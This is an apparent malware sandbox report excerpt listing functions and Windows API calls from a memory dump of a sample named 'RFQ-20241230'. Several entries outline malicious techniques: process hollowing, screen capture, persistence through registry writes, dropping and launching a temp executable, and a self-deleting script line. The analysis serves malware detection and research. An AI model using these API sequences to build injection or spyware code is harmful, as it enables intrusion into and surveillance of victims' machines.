                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                            • String ID:
                            • API String ID: 4212172061-0
                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                            • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                            • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                            Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00408DAC
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstH_prologNext
                            • String ID:
                            • API String ID: 301083792-0
                            • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                            • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                            • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                            • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                            Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                            • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                            • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                            Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                            • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                            • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                            Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                            • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                            • ExitProcess.KERNEL32 ref: 0044259E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                            • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                            • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                            Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                            • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                            • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                            • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                            Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                            • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                            • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                            Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                            • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                            • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                            Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                            • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                            • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                            • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                            Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                            • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                            • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                            Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                            • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                            • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                            • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                            Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                            • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                            • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                            • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                            • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                            Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                            • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                            • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                            • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                            Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                            • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                            Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                            • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                            • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                            • Instruction Fuzzy Hash:
                            Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                            Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                              • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                            • DeleteDC.GDI32(?), ref: 0041806D
                            • DeleteDC.GDI32(00000000), ref: 00418070
                            • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                            • GetIconInfo.USER32(?,?), ref: 004180DB
                            • DeleteObject.GDI32(?), ref: 0041810A
                            • DeleteObject.GDI32(?), ref: 00418117
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                            • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                            • DeleteDC.GDI32(?), ref: 0041828F
                            • DeleteDC.GDI32(00000000), ref: 00418292
                            • DeleteObject.GDI32(00000000), ref: 00418295
                            • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                            • DeleteObject.GDI32(00000000), ref: 00418354
                            • GlobalFree.KERNEL32(?), ref: 0041835B
                            • DeleteDC.GDI32(?), ref: 0041836B
                            • DeleteDC.GDI32(00000000), ref: 00418376
                            • DeleteDC.GDI32(?), ref: 004183A8
                            • DeleteDC.GDI32(00000000), ref: 004183AB
                            • DeleteObject.GDI32(?), ref: 004183B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 1765752176-865373369
                            • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                            • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                            • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                            • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                            Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                            • ResumeThread.KERNEL32(?), ref: 00417582
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                            • GetLastError.KERNEL32 ref: 004175C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 4188446516-3035715614
                            • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                            • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                            • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                            • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                            Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                            • ExitProcess.KERNEL32 ref: 0041151D
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                              • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                              • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                              • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
